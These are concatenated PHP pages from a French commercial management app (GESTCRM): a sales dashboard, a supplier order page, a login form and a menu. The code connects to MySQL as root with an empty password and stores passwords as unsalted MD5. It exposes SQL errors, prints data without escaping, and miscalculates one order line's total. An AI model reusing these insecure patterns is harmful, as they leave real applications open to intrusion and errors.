<script src="assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- PAGE JS -->
<script src="assets/js/tabs_accordian.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="assets/js/core.js" type="text/javascript"></script>
<script src="assets/js/chat.js" type="text/javascript"></script>
<script src="assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php include ('../../inc/header.php'); ?>
<?php include ('../../inc/pagecontainer.php'); ?>
<?php
// Totals: overall sales, today's sales, and current-month sales for the logged-in user
$sql_vos_vente_total = mysql_query("SELECT SUM(ptttc_fact_cli) as somme FROM fact_cli WHERE iduser =" .$donnees_login['iduser']);
$donnee_vos_vente_total = mysql_fetch_row($sql_vos_vente_total);
$sql_vos_vente_aujourdhui = mysql_query("SELECT SUM(ptttc_fact_cli) as total FROM fact_cli WHERE (`iduser` = '".$donnees_login['iduser']."' AND `date_facture` = '".$date."')");
$donnee_vos_vente_aujourdui = mysql_fetch_row($sql_vos_vente_aujourdhui);
$sql_vos_vente_mois = mysql_query("SELECT SUM(ptttc_fact_cli) FROM fact_cli WHERE date_facture BETWEEN '$date_mois_deb' AND '$date_mois_fin' AND iduser = ".$donnees_login['iduser']);
$donnee_vos_vente_mois = mysql_fetch_row($sql_vos_vente_mois);
?>
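<?php
/*
Caveat (sketch only, assuming date_facture holds 'd-m-Y' strings like $date):
equality comparisons on such strings work, but BETWEEN compares them
lexically, so the month query above can miss or over-match rows. Converting
in SQL keeps the schema unchanged:

$sql_vos_vente_mois = mysql_query(
	"SELECT SUM(ptttc_fact_cli) FROM fact_cli
	 WHERE STR_TO_DATE(date_facture, '%d-%m-%Y')
	       BETWEEN STR_TO_DATE('$date_mois_deb', '%d-%m-%Y')
	           AND STR_TO_DATE('$date_mois_fin', '%d-%m-%Y')
	   AND iduser = " . $donnees_login['iduser']);
*/
?>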
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="row">
<div class="col-md-12">
<div class=" tiles white col-md-12 no-padding">
<div class="tiles green cover-pic-wrapper">
<div class="overlayer bottom-right">
<div class="overlayer-wrapper">
<div class="padding-10 hidden-xs">
</div>
</div>
</div>
<img src="<?php echo $rootsite; ?>assets/img/cover_pic.png" alt="">
</div>
<div class="tiles white">
<div class="row">
<div class="col-md-3 col-sm-3" >
<div class="user-profile-pic">
<img width="69" height="69" data-src-retina="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>2x.jpg" data-src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?><?php echo $donnees_login['prenom']; ?>.jpg" alt="">
</div>
</div>
<div class="col-md-5 user-description-box col-sm-5">
<h4 class="semi-bold no-margin"><?php echo $donnees_login['prenom']; ?> <?php echo $donnees_login['nom']; ?></h4>
<h6 class="no-margin"><?php echo $donnees_login['place']; ?> pour LSI INFORMATIQUE</h6>
<br>
<p><i class="fa fa-briefcase"></i>LSI INFORMATIQUE</p>
<p><i class="fa fa-globe"></i>www.lsiinformatique.fr</p>
<p><i class="fa fa-envelope"></i>Send Message: <EMAIL></p>
</div>
</div>
<div class="col-md-12 col-vlg-12 m-b-20 ">
<div class="tiles white added-margin">
<div class="row ">
<div class="p-t-35 p-l-45">
<div class="col-md-5 col-sm-5 no-padding">
<h5 class="no-margin">Vos Ventes totals</h5>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_total[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="col-md-3 col-sm-3 no-padding">
<p class="semi-bold">Aujourd'hui le <?php echo $date; ?></p>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_aujourdui[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="col-md-3 col-sm-3 no-padding">
<p class="semi-bold">Entre le <?php echo $date_mois_deb; ?> et le <?php echo $date_mois_fin; ?>
</p>
<h4><span data-animation-duration="700" data-value="<?php echo $donnee_vos_vente_mois[0]; ?>" class="item-count animate-number semi-bold">0</span> EUR</h4>
</div>
<div class="clearfix"></div>
</div>
</div>
<h5 class="semi-bold m-t-30 m-l-30">Dernière Ventes</h5>
<table class="table no-more-tables m-t-20 m-l-20 m-b-30">
<thead style="display:none">
<tr>
<th style="width:9%">N° Facture</th>
<th style="width:22%">Client</th>
<th style="width:6%">Montant</th>
<th style="width:1%"> </th>
</tr>
</thead>
<tbody>
<?php
$sql_derniere_facture = mysql_query("SELECT * FROM fact_cli, client WHERE fact_cli.idclient = client.idclient AND fact_cli.iduser = client.iduser ORDER BY fact_cli.idfactcli DESC"); // newest invoices first, as the heading promises
while($donnee_derniere_facture = mysql_fetch_array($sql_derniere_facture))
{
?>
<tr>
<td class="v-align-middle bold text-success"><?php echo $donnee_derniere_facture['idfactcli']; ?></td>
<td class="v-align-middle"><span class="muted"><?php echo $donnee_derniere_facture['nom']; ?> <?php echo $donnee_derniere_facture['prenom']; ?></span> </td>
<td><span class="muted bold text-success"><?php echo $donnee_derniere_facture['ptttc_fact_cli']; ?> €</span> </td>
<td class="v-align-middle"></td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
</div>
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idcmdfour = (int) $_GET['idcmdfour']; // cast to int so the id cannot be used for SQL injection
$sql_societe = mysql_query("SELECT * FROM societe WHERE idsociete = 1");
$sql_cmd_four = mysql_query("SELECT * FROM fournisseur, cmd_four, article WHERE cmd_four.idfournisseur = fournisseur.idfournisseur AND idcmdfour=".$idcmdfour);
$donnee_societe = mysql_fetch_array($sql_societe);
$donnee_cmd_four = mysql_fetch_array($sql_cmd_four);
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<div class="row">
<div class="col-md-11">
<div class="grid simple">
<div class="grid-body no-border invoice-body"> <br>
<div class="pull-left"> <img src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src="<?php echo $rootsite; ?>assets/img/invoicelogo.png" data-src-retina="<?php echo $rootsite; ?>assets/img/invoicelogo2x.png" width="222" height="31" class="invoice-logo" alt="">
<address>
<strong><?php echo $donnee_societe['raison_social']; ?></strong><br>
<?php echo $donnee_societe['adresse1']; ?><br>
<?php echo $donnee_societe['cp']; ?> <?php echo $donnee_societe['ville']; ?><br>
<abbr title="Phone">Téléphone:</abbr> <?php echo $donnee_societe['tel']; ?><br>
<abbr title="Mail">Mail:</abbr><?php echo $donnee_societe['mail']; ?>
</address>
</div>
<div class="pull-right">
<h2>COMMANDE</h2>
<h6>Fournisseur</h6>
</div>
<div class="clearfix"></div>
<br>
<br>
<br>
<div class="row">
<div class="col-md-9">
</div>
<div class="col-md-3"> <br>
<div>
<div class="pull-left"> COMMANDE N° : </div>
<div class="pull-right"> CMDFOUR000<?php echo $donnee_cmd_four['idcmdfour']; ?> </div>
<div class="clearfix"></div>
</div>
<div>
<div class="pull-left"> DATE DE LA COMMANDE : </div>
<div class="pull-right"> <?php echo $donnee_cmd_four['date_cmd_four']; ?> </div>
<div class="clearfix"></div>
</div>
<br>
<div class="well well-small yellow">
<div class="pull-left"> DATE DE LIVRAISON: </div>
<div class="pull-right"> <?php echo $donnee_cmd_four['date_livraison_cmd_four']; ?> </div>
<div class="clearfix"></div>
</div>
<div class="well well-small green">
<div class="pull-left"> MONTANT TOTAL DE LA COMMANDE: </div>
<div class="pull-right"> <?php echo $donnee_cmd_four['ptttc_cmd_four']; ?> EUR </div>
<div class="clearfix"></div>
</div>
</div>
</div>
<table class="table">
<thead>
<tr>
<th class="text-left">DESCRIPTION</th>
<th style="width:30px">QTE</th>
<th style="width:140px" class="text-right">Prix Unitaire HT</th>
<th style="width:90px" class="text-right">Total HT</th>
</tr>
</thead>
<tbody>
<?php
if($donnee_cmd_four['art1'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art1']; ?></td>
<td><?php echo $donnee_cmd_four['qte1']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht1']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht1'] * $donnee_cmd_four['qte1']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art2'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art2']; ?></td>
<td><?php echo $donnee_cmd_four['qte2']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht2']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht2'] * $donnee_cmd_four['qte2']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art3'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art3']; ?></td>
<td><?php echo $donnee_cmd_four['qte3']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht3']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht3'] * $donnee_cmd_four['qte3']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art4'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art4']; ?></td>
<td><?php echo $donnee_cmd_four['qte4']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht4']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht4'] * $donnee_cmd_four['qte4']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art5'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art5']; ?></td>
<td><?php echo $donnee_cmd_four['qte5']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht5']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht5'] * $donnee_cmd_four['qte5']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art6'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art6']; ?></td>
<td><?php echo $donnee_cmd_four['qte6']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht6']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht6'] * $donnee_cmd_four['qte6']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art7'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art7']; ?></td>
<td><?php echo $donnee_cmd_four['qte7']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht7']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht7'] * $donnee_cmd_four['qte7']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art8'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art8']; ?></td>
<td><?php echo $donnee_cmd_four['qte8']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht8']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht8'] * $donnee_cmd_four['qte1']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art9'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art9']; ?></td>
<td><?php echo $donnee_cmd_four['qte9']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht9']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht9'] * $donnee_cmd_four['qte9']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art10'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art10']; ?></td>
<td><?php echo $donnee_cmd_four['qte10']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht10']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht10'] * $donnee_cmd_four['qte10']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art11'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art11']; ?></td>
<td><?php echo $donnee_cmd_four['qte11']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht11']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht11'] * $donnee_cmd_four['qte11']; ?> €</td>
</tr>
<?php } ?>
<?php
if($donnee_cmd_four['art12'] == ""){echo "";}else{
?>
<tr>
<td><?php echo $donnee_cmd_four['art12']; ?></td>
<td><?php echo $donnee_cmd_four['qte12']; ?></td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht12']; ?> €</td>
<td class="text-right"><?php echo $donnee_cmd_four['pvht12'] * $donnee_cmd_four['qte12']; ?> €</td>
</tr>
<?php } ?>
<tr>
<td colspan="2" rowspan="4" ><h4 class="semi-bold"></h4>
<p></p>
<h5 class="text-right semi-bold"></h5></td>
<td class="text-right"><strong>Frais de Port</strong></td>
<td class="text-right"><?php echo $donnee_cmd_four['port']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Remise</strong></td>
<td class="text-right"><?php echo $donnee_cmd_four['remise']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Total HT</strong></td>
<td class="text-right"><?php echo $donnee_cmd_four['ptht_cmd_four']; ?> €</td>
</tr>
<tr>
<td class="text-right no-border"><strong>Total TVA</strong></td>
<td class="text-right"><?php echo $donnee_cmd_four['taxe_cmd_four']; ?> €</td>
</tr>
<tr>
<td></td>
<td></td>
<td class="text-right no-border"><div class="well well-small green"><strong>Total TTC</strong></div></td>
<td class="text-right"><strong><?php echo $donnee_cmd_four['ptttc_cmd_four']; ?> €</strong></td>
</tr>
</tbody>
</table>
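<?php
/*
Display sketch (same data, less duplication): the twelve if-blocks above only
vary by their index, so the line items could be printed by looping over the
artN / qteN / pvhtN columns of cmd_four:

for ($i = 1; $i <= 12; $i++) {
	if ($donnee_cmd_four["art$i"] == "") { continue; }
	$total_ligne = $donnee_cmd_four["pvht$i"] * $donnee_cmd_four["qte$i"];
	echo '<tr><td>' . $donnee_cmd_four["art$i"] . '</td>'
	   . '<td>' . $donnee_cmd_four["qte$i"] . '</td>'
	   . '<td class="text-right">' . $donnee_cmd_four["pvht$i"] . ' €</td>'
	   . '<td class="text-right">' . $total_ligne . ' €</td></tr>';
}
*/
?>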
<br>
<br>
<br>
<br>
</div>
</div>
</div>
<div class="col-md-1">
<div class="invoice-button-action-set">
<p>
<a href="pdf.commande.php?idcmdfour=<?php echo $donnee_cmd_four['idcmdfour']; ?>"><button class="btn btn-info" type="button"><i class="fa fa-print"></i></button></a>
</p>
<p>
<button class="btn btn-danger" type="button" data-target="#transfere" data-toggle="modal"><i class="fa fa-exchange"></i></button>
</p>
<div aria-hidden="true" aria-labelledby="myModalLabel" role="dialog" tabindex="-1" id="transfere" class="modal fade" style="display: none;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
<br>
<i id="icon-resize" class="fa fa-exchange fa fa-6x custom-icon-space"></i>
<h4 class="semi-bold" id="myModalLabel">Transfere</h4>
<p class="no-margin">Transferer Cette Commande en Bon de Livraison ! </p>
<br>
</div>
<div class="modal-body">
<center>
<i id="animate-icon" class="fa fa-spinner fa fa-9x fa-spin"></i><br>
<h3>Transfert de la Commande <b>N°CMDFOUR000<?php echo $donnee_cmd_four['idcmdfour']; ?></b> vers le Bon de Réception <b>N° RECFOUR000<?php echo $donnee_cmd_four['idcmdfour']; ?></b> en cours...</h3>
</center>
</div>
<div class="modal-footer">
<button data-dismiss="modal" class="btn btn-warning" type="button">Annuler</button>
<a href="transfere.commande.php?idcmdfour=<?php echo $donnee_cmd_four['idcmdfour']; ?>"> <button class="btn btn-primary" type="button">Transfere</button></a>
</div>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep> <?php
// check whether the visitor submitted the login form
if (isset($_POST['connexion']) && $_POST['connexion'] == 'Connexion') {
if ((isset($_POST['login']) && !empty($_POST['login'])) && (isset($_POST['pass']) && !empty($_POST['pass']))) {
$base = mysql_connect ('localhost', 'root', '');
mysql_select_db ('gestion', $base);
// check whether a database row matches this login / password pair
$sql = 'SELECT count(*) FROM membre WHERE login="'.mysql_real_escape_string($_POST['login']).'" AND pass_md5="'.mysql_real_escape_string(md5($_POST['pass'])).'"';
$req = mysql_query($sql) or die('Erreur SQL !<br />'.$sql.'<br />'.mysql_error());
$data = mysql_fetch_array($req);
mysql_free_result($req);
mysql_close();
// exactly one match: the user is a member
if ($data[0] == 1) {
session_start();
$_SESSION['login'] = $_POST['login'];
header('Location: index.php');
exit();
}
// no match: the visitor got either the login or the password wrong
elseif ($data[0] == 0) {
$erreur = "<div class=messenger-message message alert error message-error alert-error messenger-will-hide-after>
<button data-dismiss=alert class=messenger-close type=button>×</button>
<div class=messenger-message-inner>Erreur: Compte Non Reconnu</div>
<div class=messenger-spinner>
<span class=messenger-spinner-side messenger-spinner-side-left>
<span class=messenger-spinner-fill></span>
</span>
<span class=messenger-spinner-side messenger-spinner-side-right>
<span class=messenger-spinner-fill></span>
</span>
</div>
</div>";
}
// anything else means the table holds duplicate logins - a real problem :)
else {
$erreur = "<div class=messenger-message message alert error message-error alert-error messenger-will-hide-after>
<button data-dismiss=alert class=messenger-close type=button>×</button>
<div class=messenger-message-inner>Erreur: Plusieurs membres on le même login de connexion.</div>
<div class=messenger-spinner>
<span class=messenger-spinner-side messenger-spinner-side-left>
<span class=messenger-spinner-fill></span>
</span>
<span class=messenger-spinner-side messenger-spinner-side-right>
<span class=messenger-spinner-fill></span>
</span>
</div>
</div>";
}
}
else {
$erreur = '<div class="messenger-message message alert error message-error alert-error messenger-will-hide-after">
<button data-dismiss="alert" class="messenger-close" type="button">×</button>
<div class="messenger-message-inner">Erreur: Au moins un des champs est vide.</div>
<div class="messenger-spinner">
<span class="messenger-spinner-side messenger-spinner-side-left">
<span class="messenger-spinner-fill"></span>
</span>
<span class="messenger-spinner-side messenger-spinner-side-right">
<span class="messenger-spinner-fill"></span>
</span>
</div>
</div>';
}
}
?>
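<?php
/*
Hardening sketch only (assumes the same 'gestion' database and 'membre'
table as above): the mysql_* API used in this file is deprecated, and the
same count check can be expressed as a PDO prepared statement, which also
removes the manual escaping:

$pdo  = new PDO('mysql:host=localhost;dbname=gestion;charset=utf8', 'root', '');
$stmt = $pdo->prepare('SELECT COUNT(*) FROM membre WHERE login = ? AND pass_md5 = ?');
$stmt->execute(array($_POST['login'], md5($_POST['pass'])));
$data = array((int) $stmt->fetchColumn()); // drop-in for the mysql_fetch_array() result above
*/
?>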
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="utf-8" />
<title>LSI - GESTION COMMERCIALE</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta content="" name="description" />
<meta content="" name="author" />
<!-- BEGIN CORE CSS FRAMEWORK -->
<link href="assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<link href="assets/plugins/jquery-notifications/css/messenger.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="assets/plugins/jquery-notifications/css/messenger-theme-flat.css" rel="stylesheet" type="text/css" media="screen"/>
<!-- END CORE CSS FRAMEWORK -->
<!-- BEGIN CSS TEMPLATE -->
<link href="assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
<!-- END CSS TEMPLATE -->
</head>
<!-- END HEAD -->
<!-- BEGIN BODY -->
<body class="error-body no-top">
<div class="container">
<div class="row login-container column-seperation">
<div class="col-md-5 col-md-offset-1">
<h2>Bienvenue sur GESTCRM</h2>
<p>Veuillez vous connecter pour accéder à votre espace de vente.</p>
<br>
</div>
<div class="col-md-5 "> <br>
<form id="login-form" class="login-form" action="login.php" method="post">
<div class="row">
<div class="form-group col-md-10">
<label class="form-label">Nom d'utilisateur</label>
<div class="controls">
<div class="input-with-icon right">
<i class=""></i>
<input type="text" name="login" id="txtusername" class="form-control">
</div>
</div>
</div>
</div>
<div class="row">
<div class="form-group col-md-10">
<label class="form-label">Mot de Passe</label>
<span class="help"></span>
<div class="controls">
<div class="input-with-icon right">
<i class=""></i>
<input type="password" name="pass" id="txtpassword" class="form-control">
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-10">
<button class="btn btn-primary btn-cons pull-right" type="submit" name="connexion" value="Connexion">Connexion</button>
</div>
</div>
</form>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-validation/js/jquery.validate.min.js" type="text/javascript"></script>
<script src="assets/js/login.js" type="text/javascript"></script>
<script type="text/javascript" src="assets/js/notifications.js"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><!-- BEGIN CONTENT -->
<div class="page-container row-fluid">
<!-- BEGIN SIDEBAR -->
<!-- BEGIN MENU -->
<div class="page-sidebar" id="main-menu">
<div class="page-sidebar-wrapper" id="main-menu-wrapper">
<!-- BEGIN MINI-PROFILE -->
<div class="user-info-wrapper">
<div class="profile-wrapper">
<img src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" alt="" data-src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" data-src-retina="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>2x.jpg" width="69" height="69" />
</div>
<div class="user-info">
<div class="greeting">Bievenue</div>
<div class="username"><?php echo $donnees_login['prenom']; ?> <span class="semi-bold"><?php echo $donnees_login['nom']; ?></span></div>
<div class="status">Status du service<a href="#">
<?php
if($donnee_server['status'] == 1){echo "<div class='status-icon green'></div>Online";}
if($donnee_server['status'] == 0){echo "<div class='status-icon red'></div>Offline";}
?>
</a></div>
</div>
</div>
<!-- END MINI-PROFILE -->
<!-- BEGIN SIDEBAR MENU -->
<ul>
<!-- BEGIN SELECTED LINK -->
<li class="">
<a href="<?php echo $rootsite; ?>">
<i class="icon-custom-home"></i>
<span class="title">Accueil</span>
<span class="selected"></span>
</a>
</li>
<!-- END SELECTED LINK -->
<!-- BEGIN BADGE LINK -->
<li class="">
<a href="javascript:;">
<i class="fa fa-folder-open"></i>
<span class="title">Donnée</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li>
<a href="javascript:;"><span class="title">Client</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/donnee/client/">Liste des Clients</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/client/nouv.client.php">Nouveau Client</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/client/">Modifier un client</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/client/">Supprimer un client</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Article</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/donnee/article/">Liste des Articles</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/article/nouv.article.php">Nouvel Article</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/article/">Modifier un Article</a></li>
<li><a href="<?php echo $rootsite; ?>core/donnee/article/">Supprimer un Article</a></li>
</ul>
</li>
</ul>
</li>
<li class="">
<a href="javascript:;">
<i class="fa fa-suitcase"></i>
<span class="title">Achat</span>
<span class="arrow"></span>
</a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/">Tableau de Bord des Achats</a></li>
<li>
<a href="javascript:;"><span class="title">Devis Fournisseur</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/devis/index.devis.php">Liste des Devis Fournisseur</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/devis/nouv.devis.php">Nouveau Devis</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/devis/">Modifier un Devis</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/devis/">Supprimer un Devis</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Commande Fournisseur</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/commande/index.commande.php">Liste des Commandes</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/commande/nouv.commande.php">Nouvelle Commande</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/commande/">Modifier une Commande</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/commande/">Supprimer une Commande</a></li>
</ul>
</li>
<li>
<a href="javascript:;"><span class="title">Bon de Livraison Fournisseur</span><span class="arrow "></span></a>
<ul class="sub-menu">
<li><a href="<?php echo $rootsite; ?>core/achat/reception/index.reception.php">Liste des Receptions</a></li>
<li><a href="<?php echo $rootsite; ?>core/achat/reception/nouv.reception.php">Nouvelle Reception</a></li>
